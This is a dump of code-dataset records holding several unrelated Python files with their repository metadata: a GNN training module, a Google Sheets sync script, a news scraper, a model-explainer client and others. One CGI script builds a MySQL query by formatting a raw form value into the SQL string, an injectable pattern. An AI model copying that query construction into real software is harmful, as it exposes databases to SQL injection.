mode == 'test':\r\n\t\t\treturn data[edge_type].y[data[edge_type].test_idx]\r\n\t\telif mode == 'all':\r\n\t\t\treturn data[edge_type].y\r\n\t\telse:\r\n\t\t\traise ValueError(\"GNN ground_truth(): mode can only be 'train', 'val', 'test' or 'all'\")\r\n\r\n\tdef inspect_node(self, data, node_idx):\r\n\t\tnode_gt = {}\r\n\t\tfor edge_from,edge_to,y in zip(self.inspect(data)[0], self.inspect(data)[1], self.ground_truth(data)):\r\n\t\t\tif edge_from == node_idx:\r\n\t\t\t\tnode_gt[edge_to] = y\r\n\t\treturn list(dict(sorted(node_gt.items(), key=lambda item: item[1], reverse=True)).keys())\r\n\r\n\tdef evaluate_nodes(self, x_dict, edge_index_dict, edge_label_index, edge_attr_dict, targets):\r\n\t\t# Compute output and give ground truths node by node - for ranking purposes\r\n\t\tpredictions = self.forward(x_dict, edge_index_dict, edge_label_index, edge_attr_dict)\r\n\t\toutputs, ground_truths = [], []\r\n\t\tfor node_idx in 
edge_label_index[0].unique():\r\n\t\t\tsel = torch.where(edge_label_index[0] == node_idx)\r\n\t\t\toutputs.append(predictions[sel[0]])\r\n\t\t\tground_truths.append(targets[sel[0]])\r\n\t\treturn outputs, ground_truths\r\n\r\n\tdef calculate_loss(self, pred, target, weights=None, penalize_fn=False, reduction='none'):\r\n\t\tif weights is None:\r\n\t\t\tif self.loss_function == 'cross_entropy':\r\n\t\t\t\tloss = F.binary_cross_entropy_with_logits(pred, target.float(), reduction='none')\r\n\t\t\telif self.loss_function == 'mean_square_error':\r\n\t\t\t\tloss = weighted_mse_loss(pred, target)\r\n\t\t\telif self.loss_function == 'mean_absolute_error':\r\n\t\t\t\tloss = weighted_mean_absolute_error_loss(pred, target)\r\n\t\t\telif self.loss_function == 'root_mean_square_error':\r\n\t\t\t\tloss = weighted_rmse(pred, target)\r\n\t\t\telif self.loss_function == 'pearson_correlation_coefficient':\r\n\t\t\t\tloss = pearson_correlation_coefficient(pred.flatten(), target.flatten())\r\n\t\t\telse:\r\n\t\t\t\traise Error('Model: loss function {} not implemented'.format(self.loss_function))\r\n\t\telse:\r\n\t\t\tweights = get_sample_weights(target, weights)\r\n\t\t\ttarget, indices = correct_negative_edges(target)\r\n\t\t\tif self.loss_function == 'cross_entropy':\r\n\t\t\t\t# raw_loss = F.binary_cross_entropy_with_logits(pred, target.float(), weight=torch.Tensor(weights), reduction='none')\r\n\t\t\t\t# return torch.index_select(raw_loss, dim=0, index=torch.LongTensor(indices)).mean()\r\n\t\t\t\tloss = F.binary_cross_entropy_with_logits(pred, target.float(), weight=torch.Tensor(weights), reduction='none')\r\n\t\t\telif self.loss_function == 'mean_square_error':\r\n\t\t\t\tloss = weighted_mse_loss(pred, target, weight=weights)\r\n\t\t\telif self.loss_function == 'mean_absolute_error':\r\n\t\t\t\tloss = weighted_mean_absolute_error_loss(pred, target, weight=weights)\r\n\t\t\telif self.loss_function == 'root_mean_square_error':\r\n\t\t\t\tloss = weighted_rmse(pred, target, weight=weights)\r\n\t\t\telse:\r\n\t\t\t\traise Error('Model: loss function {} not implemented'.format(self.loss_function))\r\n\r\n\t\t\r\n\t\tif penalize_fn:\r\n\t\t\tloss = penalize_false_negative(loss, pred, target)\r\n\r\n\t\tif self.loss_function == 'pearson_correlation_coefficient':\r\n\t\t\treturn torch.sub(1, loss)\r\n\t\tif reduction == 'mean':\r\n\t\t\tloss = torch.mean(loss)\r\n\t\telif reduction == 'sum':\r\n\t\t\tloss = torch.sum(loss)\r\n\t\telif reduction == 'none':\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\traise Error(\"Model: Reduction should be set to 'mean', 'sum' or 'none'\")\r\n\t\t\r\n\t\treturn loss\r\n\t\t\r\n\r\n\tdef train_graph(self, data, optimizer, weights=None, penalize_fn=False, set='train'):\r\n\t\tself.train()\r\n\t\toptimizer.zero_grad()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tloss = self.calculate_loss(pred, target, weights=weights, penalize_fn=penalize_fn, reduction='mean')\r\n\t\tloss.backward()\r\n\t\t# Gradient clipping - it tends to vanish otherwise\r\n\t\tnn.utils.clip_grad_value_(self.parameters(), clip_value=1.0)\r\n\t\toptimizer.step()\r\n\t\treturn loss\r\n\t\r\n\tdef train_deterministic_graph(self, data, optimizer, activation_level, set='train'):\r\n\t\tself.train()\r\n\t\toptimizer.zero_grad()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)\r\n\t\tdet_target = 
(target >= activation_level).float()\r\n\t\tactivated_pred = torch.sigmoid(torch.sub(pred, activation_level))\r\n\t\t# loss = torch.binary_cross_entropy_with_logits(activated_pred, target).mean()\r\n\t\tcriterion = torch.nn.BCELoss()\r\n\t\tloss = criterion(activated_pred, det_target)\r\n\t\tloss.backward()\r\n\t\t# Gradient clipping - it tends to vanish otherwise\r\n\t\tnn.utils.clip_grad_value_(self.parameters(), clip_value=1.0)\r\n\t\toptimizer.step()\r\n\t\treturn loss\r\n\r\n\t@torch.no_grad() # gradients are not needed at test time, so skip computing them to save computation\r\n\tdef test_graph(self, data, weights=None, penalize_fn=False, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tloss = self.calculate_loss(pred, target, weights=weights, penalize_fn=penalize_fn, reduction='mean')\r\n\t\treturn loss\r\n\t\r\n\t@torch.no_grad()\r\n\tdef predict_graph(self, data, set='test'):\r\n\t\tself.eval()\r\n\t\treturn self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\r\n\t@torch.no_grad()\r\n\tdef test_predict_graph(self, data, weights=None, penalize_fn=False, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tloss = self.calculate_loss(pred, target, weights=weights, penalize_fn=penalize_fn, reduction='mean')\r\n\t\treturn pred, loss\r\n\r\n\t@torch.no_grad()\r\n\tdef test_rbo(self, data, set='test'):\r\n\t\tself.eval()\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tpredictions, ground_truths = self.evaluate_nodes(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict, target)\r\n\t\tcriterion = RBOLoss(reduction='mean')\r\n\t\tloss = criterion(predictions, ground_truths)\r\n\t\treturn loss.item()\r\n\r\n\t@torch.no_grad()\r\n\tdef test_pearson(self, data, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\t# pearson = PearsonCorrCoef()\r\n\t\t# loss = pearson(pred, target)\r\n\t\tloss = pearson_correlation_coefficient(pred.flatten(), target.flatten())\r\n\t\treturn loss.item()\r\n\r\n\t@torch.no_grad()\r\n\tdef test_r2(self, data, device, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\t# pearson = PearsonCorrCoef()\r\n\t\t# loss = pearson(pred, target)\r\n\t\tr2score = R2Score().to(device)\r\n\t\tloss = r2score(pred.flatten(), target.flatten())\r\n\t\treturn loss.item()\r\n\r\n\t@torch.no_grad()\r\n\tdef test_rmse(self, data, weights=None, set='test'):\r\n\t\tself.eval()\r\n\t\tpred = self(data.x_dict, data.edge_index_dict, self.inspect(data, mode=set), data.edge_attr_dict)\r\n\t\ttarget = self.ground_truth(data, mode=set)#.float()\r\n\t\tloss = weighted_rmse(pred, target, weight=weights)\r\n\t\treturn torch.mean(loss).item()\r\n\r\n\t@torch.no_grad()\r\n\tdef test_predict_missings(self, data, dataset, weights=None, penalize_fn=False):\r\n\t\tself.eval()\r\n\t\tmissing_idx = self.inspect(data, mode='missing')\r\n\t\tall_preds = self(data.x_dict, 
data.edge_index_dict, missing_idx, data.edge_attr_dict)\r\n\t\tmissing2chembl = dataset.get_missing_in_chembl(missing_idx, edge_type=(self.link_from, self.link_to))\r\n\t\tpred = all_preds[list(missing2chembl.keys())].detach().cpu()\r\n\t\ttarget = torch.Tensor(list(missing2chembl.values()))\r\n\t\tloss = self.calculate_loss(pred.flatten(), target.flatten(), weights=weights, penalize_fn=penalize_fn, reduction='mean')\r\n\t\treturn pred, loss, all_preds\r\n\r\n","repo_name":"SimonCrouzet/g-plip","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13469,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"10656845498","text":"import streamlit as st\nimport pandas as pd\nimport gspread\nfrom google.oauth2 import service_account\n\n# Create credentials and an authorized gspread client.\ncredentials = service_account.Credentials.from_service_account_info(\n st.secrets[\"gcp_service_account\"],\n scopes=[\n \"https://www.googleapis.com/auth/spreadsheets\",\"https://www.googleapis.com/auth/drive\"\n ],\n)\nclient = gspread.authorize(credentials)\n\nsheet_id = '1c18r7CgRmubA2tzGgIIZJdV8Srgn2PyPVSX8tyH351Y'\ncsv_url = f\"https://docs.google.com/spreadsheets/d/{sheet_id}/export?format=csv\"\ndatabase_df = pd.read_csv(csv_url, on_bad_lines='skip')\n\ndatabase_df = database_df.astype(str)\nsheet_url = st.secrets[\"private_gsheets_url\"] # this URL must be provided in the Streamlit secrets\nsheet = client.open_by_url(sheet_url).sheet1\nsheet.update([database_df.columns.values.tolist()] + database_df.values.tolist())\nst.success('Data has been written to Google Sheets')\n","repo_name":"ramida22/st-hello-world","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41423672076","text":"d1 = {\n \"apple\": 280,\n \"banana\": 60,\n \"cat\": 3800,\n \"dog\": 20000,\n \"egg\": 5,\n \"food\": 50\n}\n\nkey = input(\"Enter the item: \")\n\nif key in d1:\n print(d1[key])\nelse:\n print(\"No such item exists.\")\n\n","repo_name":"Mahaakrish/lilly_python","sub_path":"ad.py","file_name":"ad.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16880311282","text":"from time import sleep\nfrom structure import structure\nfrom constants import (\n OUTPUT_FILE,\n CHANNELS_NAMES,\n RIA_NEWS_KEYWORD,\n ONE_DAY_IN_SECOND\n)\n\n\ndef scrape():\n telegram_scraper = structure.telegram_scraper\n exposures_statistics_service = structure.exposures_statistics_service\n ria_news_scraper = structure.ria_news_scraper\n exposures_repository = structure.exposures_repository\n\n exposures_from_telegram_channels = telegram_scraper.scrape_channels(CHANNELS_NAMES)\n exposures_from_ria_news = ria_news_scraper.scrape(RIA_NEWS_KEYWORD)\n exposures = exposures_from_ria_news + exposures_from_telegram_channels\n statistics = exposures_statistics_service.get_statistics_by_type(exposures)\n\n exposures_repository.save_on_json_file(OUTPUT_FILE, exposures, statistics)\n\n\nif __name__ == '__main__':\n while True:\n scrape()\n 
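# wait a full day between scrape passes (ONE_DAY_IN_SECOND is imported from constants above)\n 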
sleep(ONE_DAY_IN_SECOND)\n","repo_name":"Entarudin/scraper","sub_path":"scrape_sources.py","file_name":"scrape_sources.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23130405085","text":"from pipelines.viral_analysis_pipeline.pipeline_objs.pipeline_objs_consts import *\nfrom pathlib import Path\nfrom utils.queue_managers import load_json, dump_json\nimport pandas as pd\nfrom pipelines.viral_analysis_pipeline.analysis_helpers import _split_a_list, _calc_num_splits, _analyze_intersection_res_dir\nfrom random import shuffle\nfrom pipeline import NonRepeatingPipeline\n\ndef _prep_env(attrs: dict):\n # metadata_file = attrs[METADATA_FILE_PATH_ATTR]\n # res_file = attrs[REAL_PROP_RES_PATH_ATTR]\n virus_res_root = attrs[VIRUS_RES_ROOT_ATTR]\n\n output_root = Path(virus_res_root) / \"intersection_data\"\n\n root_path = Path(output_root)\n inter_output_dir = root_path / \"inter\"\n cross_output_dir = root_path / \"cross\"\n by_size_output_dir = root_path / \"by_size\"\n all_interactors_output_dir = root_path / \"all_interactors\"\n intersections_output_dir = root_path / \"intersection_results\"\n\n root_path.mkdir(exist_ok=True)\n inter_output_dir.mkdir(exist_ok=True)\n cross_output_dir.mkdir(exist_ok=True)\n by_size_output_dir.mkdir(exist_ok=True)\n all_interactors_output_dir.mkdir(exist_ok=True)\n intersections_output_dir.mkdir(exist_ok=True)\n\n attrs[INTER_OUTPUT_DIR_ATTR] = inter_output_dir\n attrs[CROSS_OUTPUT_DIR_ATTR] = cross_output_dir\n attrs[BY_SIZE_OUTPUT_DIR_ATTR] = by_size_output_dir\n attrs[ALL_OUTPUT_DIR_ATTR] = all_interactors_output_dir\n attrs[INTERSECTION_OUTPUT_DIR_ATTR] = intersections_output_dir\n\n\ndef _randomly_split(attrs: dict) -> dict[list[list[str]]]:\n metadata_path = attrs[METADATA_FILE_PATH_ATTR]\n prot_map = load_json(metadata_path)\n proteins = attrs.get(\"proteins\", None)\n\n if proteins is None:\n proteins = list(prot_map.keys())\n elif not isinstance(proteins, list):\n proteins = [proteins]\n\n prot_map[\"all\"] = list(set().union(*[v for v in prot_map.values()]))\n return {\n protein: [_split_a_list(prot_map[protein]) for\n i in range(_calc_num_splits(len(prot_map[protein])))]\n for protein in proteins if len(prot_map[protein]) >= 10\n }\n\n\ndef _random_cross_proteins_splits(attrs: dict):\n metadata_path = attrs[METADATA_FILE_PATH_ATTR]\n res_path = attrs[REAL_PROP_RES_PATH_ATTR]\n proteins = attrs.get(\"proteins\", None)\n\n res = pd.read_csv(res_path)\n prot_to_interactors = load_json(metadata_path)\n if proteins is None:\n proteins = [c for c in res.columns if c != \"nodes\" and not c.isnumeric()]\n\n actual_proteins = []\n for i in range(len(proteins) - 1):\n p1 = proteins[i]\n for j in range(i + 1, len(proteins)):\n p2 = proteins[j]\n key = f\"{p1},{p2}\"\n prot_to_interactors[key] = list(set(prot_to_interactors[p1]) | set(prot_to_interactors[p2]))\n actual_proteins.append(key)\n return {\n protein: [_split_a_list(prot_to_interactors[protein])\n for i in range(_calc_num_splits(len(prot_to_interactors[protein])))] for protein in actual_proteins if\n len(prot_to_interactors[protein]) >= 10\n }\n\n\ndef _split_by_size(attrs: dict):\n res_path = attrs[REAL_PROP_RES_PATH_ATTR]\n res = pd.read_csv(res_path)\n interactors_columns = [c for c in res.columns if c.isnumeric()]\n splits = dict()\n for split_size in [10, 15, 20, 30, 40]:\n shuffle(interactors_columns)\n interactors_in_split = interactors_columns[:split_size]\n splits[split_size] = 
[_split_a_list(interactors_in_split) for _ in range(_calc_num_splits(split_size))]\n\n return splits\n\ndef create_inter_splits_data(attrs: dict):\n inter_output_dir = attrs[INTER_OUTPUT_DIR_ATTR]\n print(f\" *********** WORKING ON SPLIT TYPE INTER ***********\")\n for i in range(10):\n splits = _randomly_split(attrs)\n dump_json(splits, str(inter_output_dir / f\"splits_{i}.json\"))\n _analyze_intersection_res_dir(inter_output_dir, attrs[INTERSECTION_OUTPUT_DIR_ATTR], \"inter\", attrs[REAL_PROP_RES_PATH_ATTR])\n\ndef create_cross_splits_data(attrs: dict):\n cross_output_dir = attrs[CROSS_OUTPUT_DIR_ATTR]\n print(f\" *********** WORKING ON SPLIT TYPE CROSS ***********\")\n for i in range(10):\n splits = _random_cross_proteins_splits(attrs)\n dump_json(splits, str(cross_output_dir / f\"splits_{i}.json\"))\n _analyze_intersection_res_dir(cross_output_dir, attrs[INTERSECTION_OUTPUT_DIR_ATTR], \"cross\",\n attrs[REAL_PROP_RES_PATH_ATTR])\n\ndef create_by_size_splits_data(attrs: dict):\n by_size_output_dir = attrs[BY_SIZE_OUTPUT_DIR_ATTR]\n print(f\" *********** WORKING ON SPLIT TYPE BY_SIZE ***********\")\n for i in range(10):\n splits = _split_by_size(attrs)\n dump_json(splits, str(by_size_output_dir / f\"splits_{i}.json\"))\n\n _analyze_intersection_res_dir(by_size_output_dir, attrs[INTERSECTION_OUTPUT_DIR_ATTR], \"by_size\",\n attrs[REAL_PROP_RES_PATH_ATTR])\n# def create_all_splits_data(attrs:dict):\n# by_size_output_dir = attrs[BY_SIZE_OUTPUT_DIR_ATTR]\n# print(f\" *********** WORKING ON SPLIT TYPE CROSS ***********\")\n# for i in range(10):\n# splits = _split_by_size(attrs)\n# dump_json(splits, str(by_size_output_dir / f\"splits_{i}.json\"))\n\n\ndef get_pipeline(virus_name: str, reset_state: bool=False) -> NonRepeatingPipeline:\n pipe = NonRepeatingPipeline(state_suffix=virus_name + \"intersection_analysis_state\", reset_state=reset_state)\n pipe.add_steps(\n [\n _prep_env,\n create_inter_splits_data,\n create_by_size_splits_data,\n create_cross_splits_data\n ]\n )\n return pipe","repo_name":"EtayLivne/netprop_analysis","sub_path":"pipelines/viral_analysis_pipeline/pipeline_objs/intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20065822662","text":"#!/usr/bin/env python\n#coding:utf-8\n\nimport mysql\nimport cgi\nimport cgitb\ncgitb.enable()\nimport yate\nimport json\nform_data = cgi.FieldStorage()\nchid = ''\nif \"chid\" in form_data:\n chid = form_data['chid'].value\n\nprint(yate.start_response('application/json'))\nconn = mysql.connect()\ncursor = conn.cursor()\n# bind chid as a query parameter instead of %-formatting it into the SQL (avoids injection; assumes a DB-API style cursor)\ncursor.execute(\"\"\"select live_url.live_path from live_url,tvs_channel where tvs_channel.chid=live_url.chid and live_url.chid=%s\"\"\", (chid,))\nresponse = cursor.fetchall()\nresults = ''\nif response != ():\n results = response[0][0]\n \nprint(json.dumps(results))","repo_name":"yangmeitaozi/tvcloud","sub_path":"tvcloud_zb/cgi-bin/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24640754149","text":"from anchor import anchor_tabular\nimport asyncio\nimport numpy as np\nimport pandas\nimport random\nimport requests\nimport itertools\nimport json\nfrom tensorflow.python.lib.io import file_io\nfrom pandas.compat import StringIO\n\nimport utils\n\nREGRESSION = 'regression'\nCLASSIFICATION = 'classification'\n\n\nclass Explainer:\n\n def 
__cmle_predict(self, record):\n name = 'projects/{}/models/{}'.format(self.__gcp_project, self.__gcp_model)\n if self.__gcp_model_version is not None:\n name += '/versions/{}'.format(self.__gcp_model_version)\n\n url = 'https://ml.googleapis.com/v1/' + name + ':predict'\n \n result = requests.post(\n url,\n json={'instances': record},\n headers={\n 'Authorization':'Bearer ' + self.__access_token})\n\n response = json.loads(result.text)\n try:\n return response['predictions']\n except:\n print('record', record)\n print('response',response)\n return response['predictions']\n\n\n def __get_label_values (self):\n cat_labels = utils.load_csv_dataset(\n data=StringIO(self.__csv_file),\n feature_names = self.__feature_names,\n target_idx = -1,\n skip_first = self.__skip_first,\n categorical_features = [],\n features_to_use= [self.__target_idx],\n discretize = True\n ).categorical_names[0]\n self.__categorical_labels = [\n bytes(\n x,\n 'utf-8') for x in cat_labels]\n return [float(\n cat_labels[i].split(\n ' <= ')[-1]) for i in range(9)]\n\n\n\n def __create_transform_func(self, quant_val):\n\n def transfrom_labels(r):\n labels = []\n for x in r:\n x = float(x)\n if x <= quant_val[0]:\n labels.append(\n self.__categorical_labels[0])\n if x > quant_val[0] and x <= quant_val[1]:\n labels.append(\n self.__categorical_labels[1])\n if x > quant_val[1] and x <= quant_val[2]:\n labels.append(\n self.__categorical_labels[2])\n if x > quant_val[2] and x <= quant_val[3]:\n labels.append(\n self.__categorical_labels[3])\n if x > quant_val[3] and x <= quant_val[4]:\n labels.append(\n self.__categorical_labels[4])\n if x > quant_val[4] and x <= quant_val[5]:\n labels.append(\n self.__categorical_labels[5])\n if x > quant_val[5] and x <= quant_val[6]:\n labels.append(\n self.__categorical_labels[6])\n if x > quant_val[6] and x <= quant_val[7]:\n labels.append(\n self.__categorical_labels[7])\n if x > quant_val[7] and x <= quant_val[8]:\n labels.append(\n self.__categorical_labels[8])\n if x > quant_val[8]:\n labels.append(\n self.__categorical_labels[9])\n return labels\n\n return transfrom_labels\n\n\n def __get_value_mapper(self):\n self.__col_buckets=[]\n for i in range(0,len(\n self.__explainer.categorical_names)):\n \n if i in self.__dataset.ordinal_features:\n \n cols = [(\n float('-inf'),\n float(\n self.__explainer.categorical_names[i][0].split(' <= ')[-1]))]\n for mid in self.__explainer.categorical_names[i][1:-1]:\n cols.append((\n float(mid.split(' < ')[0]),\n float(mid.split(' <= ')[-1])))\n cols.append((\n float(\n self.__explainer.categorical_names[i][-1].split(' > ')[-1]),\n float('inf')))\n self.__col_buckets.append(cols)\n \n else: \n self.__col_buckets.append(self.__explainer.categorical_names[i])\n\n tr_data = pandas.read_csv(\n StringIO(self.__csv_file),\n header = 0,\n names = self.__feature_names,\n delimiter=',',\n na_filter=True,\n dtype=str).fillna(\"-1\").values\n del self.__csv_file\n tr_data = tr_data[:, self.__features_to_use]\n \n\n val_buckets = []\n for col in range(tr_data.shape[1]):\n \n if col in self.__dataset.ordinal_features:\n \n val_list = {i:[] for i in range(len(self.__col_buckets[col]))}\n for val in tr_data[:,col]:\n for buck in range(len(self.__col_buckets[col])):\n if float(\n val) > self.__col_buckets[col][buck][0] and float(\n val) <= self.__col_buckets[col][buck][1]:\n\n val_list[buck].append(float(val))\n break\n val_buckets.append(\n [int(np.median(val_list[buck])) if np.median(val_list[buck]).is_integer() else np.median(\n val_list[buck]) for buck in 
range(len(self.__col_buckets[col]))])\n else:\n val_buckets.append(self.__col_buckets[col])\n\n return list(itertools.chain.from_iterable(val_buckets))\n\n\n\n def __encode_record(self, record):\n encoded = []\n for val in range(\n len(record)):\n \n if val in self.__dataset.ordinal_features:\n for buck in range(\n len(self.__col_buckets[val])):\n if float(\n record[val]) > self.__col_buckets[val][buck][0] and float(\n record[val]) <= self.__col_buckets[val][buck][1]:\n\n encoded.append(buck)\n break\n else:\n for buck in range(\n len(self.__col_buckets[val])):\n if record[val] == self.__col_buckets[val][buck]:\n encoded.append(buck)\n break\n return np.array(encoded)\n \n \n def __decode_record(self, record):\n return list(itertools.compress(\n self.__value_mapper,\n record.todense().astype(\n int).tolist()[0]))\n \n \n def __predict(self, record):\n\n if self.__csv_record:\n pred_data = [','.join(self.__pre_pad + [\n str(\n x) for x in self.__decode_record(\n record[i,:])] + self.__post_pad) for i in range(\n record.shape[0])]\n \n else:\n pred_data = [dict(zip(\n self.__dataset.feature_names,\n self.__decode_record(\n record[i,:])))for i in range(\n record.shape[0])]\n \n predictions = self.__cmle_predict(pred_data)\n predictions = [self.__output_func(x) for x in predictions]\n if self.model_type == REGRESSION:\n predictions = self.__transform_labels(predictions)\n predictions = [self.__label_map[x] for x in predictions]\n predictions = np.array(predictions)\n return predictions\n\n \n \n def load_data(\n self,\n gcs_path,\n target_idx,\n features_to_use=None,\n categorical_features=[],\n feature_names=None,\n skip_first=False\n ):\n \n self.__target_idx = target_idx\n self.__features_to_use = features_to_use\n self.__feature_names = feature_names\n self.__skip_first = skip_first\n \n self.__numeric_features = list(set(\n features_to_use).difference(\n set(categorical_features)))\n \n self.__csv_file = file_io.FileIO(\n gcs_path,\n mode='r').read()\n \n if self.model_type == REGRESSION:\n self.__transform_labels = self.__create_transform_func(\n self.__get_label_values())\n \n self.__dataset = utils.load_csv_dataset(\n data=StringIO(self.__csv_file),\n feature_names = feature_names,\n skip_first = skip_first,\n target_idx =target_idx,\n categorical_features = categorical_features,\n features_to_use= features_to_use,\n discretize = True,\n feature_transformations = {\n target_idx : self.__transform_labels\n })\n else:\n self.__dataset = utils.load_csv_dataset(\n data=StringIO(self.__csv_file),\n feature_names = feature_names,\n skip_first = skip_first,\n target_idx =target_idx,\n categorical_features = categorical_features,\n features_to_use= features_to_use,\n discretize = True)\n\n \n self.__label_map = {\n self.__dataset.class_names[i] : i for i in range(\n len(self.__dataset.class_names))}\n \n self.__explainer = anchor_tabular.AnchorTabularExplainer(\n self.__dataset.class_names,\n self.__dataset.feature_names,\n self.__dataset.data,\n self.__dataset.categorical_names,\n self.__dataset.ordinal_features)\n \n self.__explainer.fit(\n self.__dataset.train,\n self.__dataset.labels_train,\n self.__dataset.validation,\n self.__dataset.labels_validation)\n \n self.__value_mapper = self.__get_value_mapper()\n \n def create_cmle_client(\n self,\n gcp_project,\n gcp_model,\n access_token,\n gcp_model_version=None,\n csv_record=True,\n padding = (1,0),\n output_func = lambda x: x[\n 'predictions'][0]):\n \n self.__gcp_project = gcp_project\n self.__gcp_model = gcp_model\n self.__csv_record = 
csv_record\n self.__gcp_model_version = gcp_model_version\n self.__pre_pad = ['0' for _ in range(padding[0])]\n self.__post_pad = ['0' for _ in range(padding[1])]\n self.__output_func = output_func\n self.__access_token = access_token\n \n \n def __assess_sample(\n self,\n idx):\n if self.__explainer.class_names[\n self.__dataset.labels_test[idx]] == self.__predict_record(\n self.__one_hot_encode(\n self.__dataset.test[idx])):\n return 1\n else:\n return 0\n \n \n async def __assess_model(\n self,\n sample):\n \n loop = asyncio.get_event_loop()\n samples = [\n loop.run_in_executor(\n None,\n self.__assess_sample,\n idx) for idx in random.sample(\n range(len(self.__dataset.test)),\n sample)]\n responses = [await s for s in samples]\n \n return sum(responses)\n \n def assess_model(\n self,\n sample=100):\n \n self.__check_requisites()\n \n accurate = self.__event_loop.run_until_complete(\n self.__assess_model(sample))\n\n return {'accuracy' : accurate/float(sample)}\n\n \n def __explain_sample(\n self,\n idx,\n threshold):\n\n anchor = {}\n\n anchor['prediction'] = self.__predict_record(\n self.__one_hot_encode(\n self.__dataset.test[idx]))\n exp = self.__explainer.explain_instance(\n self.__dataset.test[idx],\n self.__predict,\n threshold,\n delta=0.05, tau=0.1, batch_size=10,\n max_anchor_size=10)\n \n anchor['precision'] = exp.precision()\n anchor['coverage'] = exp.coverage()\n anchor['anchor'] = ' AND '.join(exp.names())\n\n return anchor\n \n \n async def __explain_model(\n self,\n threshold,\n sample):\n\n loop = asyncio.get_event_loop()\n samples = [\n loop.run_in_executor(\n None,\n self.__explain_sample,\n idx,\n threshold) for idx in random.sample(\n range(len(self.__dataset.test)),\n sample)]\n return [await s for s in samples]\n\n \n def explain_model(\n self,\n threshold = 0.95,\n sample = 100):\n \n self.__check_requisites()\n \n anchors = self.__event_loop.run_until_complete(\n self.__explain_model(threshold, sample))\n \n return pandas.DataFrame(\n anchors).drop_duplicates(\n ['anchor']).sort_values(\n 'coverage',\n ascending = False).reset_index()[[\n 'anchor',\n 'coverage',\n 'precision',\n 'prediction']]\n \n \n def __explain_record(\n self,\n record,\n threshold,\n delta,\n tau,\n batch_size,\n max_anchor_size,\n show_in_notebook = False):\n \n one_hot_record = self.__one_hot_encode(record)\n\n pred = self.__predict_record(one_hot_record)\n\n exp = self.__explainer.explain_instance(\n record,\n self.__predict,\n threshold,\n delta=delta,\n tau=tau,\n batch_size=batch_size,\n max_anchor_size=max_anchor_size)\n\n if show_in_notebook:\n exp.show_in_notebook()\n\n return {\n 'anchor': ' AND '.join(exp.names()),\n 'precision': exp.precision(),\n 'coverage' : exp.coverage(),\n 'prediction' : pred,\n 'record': self.__decode_record(one_hot_record)}\n\n \n def explain_record(\n self,\n record,\n threshold = 0.95,\n delta=0.05,\n tau=0.2,\n batch_size=100,\n max_anchor_size=20,\n show_in_notebook = False):\n \n self.__check_requisites()\n \n record = self.__encode_record(\n record)\n \n return self.__explain_record(\n record,\n threshold,\n delta,\n tau,\n batch_size,\n max_anchor_size,\n show_in_notebook)\n \n \n def explain_random_record(\n self,\n threshold = 0.95,\n delta=0.05,\n tau=0.2,\n batch_size=100,\n max_anchor_size=20,\n show_in_notebook = False):\n \n self.__check_requisites()\n \n idx = random.randint(0,len(self.__dataset.test))\n return self.__explain_record(\n self.__dataset.test[idx],\n threshold,\n delta,\n tau,\n batch_size,\n max_anchor_size,\n 
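# same anchor-search parameters as explain_record, applied to one randomly drawn test row\n 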
show_in_notebook)\n \n \n def __check_requisites(self):\n if not '_Explainer__explainer' in self.__dict__:\n raise Exception(\n 'Please load a dataset using load_data(...)')\n if not '_Explainer__gcp_model' in self.__dict__:\n raise Exception(\n 'Please create a cmle client using create_cmle_client(...)')\n \n def __one_hot_encode(self, record):\n\n return self.__explainer.encoder.transform(\n record.reshape(1, -1))\n \n def __predict_record(\n self,\n record):\n return self.__explainer.class_names[list(\n self.__predict(record))[0]]\n \n\n def __init__(\n self,\n model_type = REGRESSION\n ):\n self.model_type = model_type\n self.__event_loop = asyncio.new_event_loop()\n \n","repo_name":"lukmanr/ml-explainability","sub_path":"anchor/anchor_explainer.py","file_name":"anchor_explainer.py","file_ext":"py","file_size_in_byte":16010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30166331569","text":"class Solution:\n def sift_down( self, arr, n, i ):\n largest = i\n l = i * 2 + 1\n r = i * 2 + 2\n \n if l < n and arr[ l ] > arr[ largest ]:\n largest = l\n if r < n and arr[ r ] > arr[ largest 